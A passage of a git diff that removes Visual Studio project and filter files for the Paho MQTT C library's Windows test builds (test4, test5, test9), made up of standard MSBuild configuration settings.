-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\MQTTAsync.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\test4.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj.filters
deleted file mode 100644
index 6ea29d7..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test4.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj
deleted file mode 100755
index f0ee0b2..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj
+++ /dev/null
@@ -1,173 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{B8A895EA-C8DE-4235-B4B4-06889BBBDC93}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>test1</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3as.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3as.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3as.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3as.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\MQTTAsync.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\test5.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj.filters
deleted file mode 100644
index a9e956e..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test5/test5.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test5.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj
deleted file mode 100644
index 19d966f..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj
+++ /dev/null
@@ -1,170 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{D133C05E-87A6-48C6-A703-188A83B82400}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>test9</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3a.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test9.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj.filters
deleted file mode 100644
index dc608bf..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test9/test9.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test9.c">
-      <Filter>Source Files</Filter>
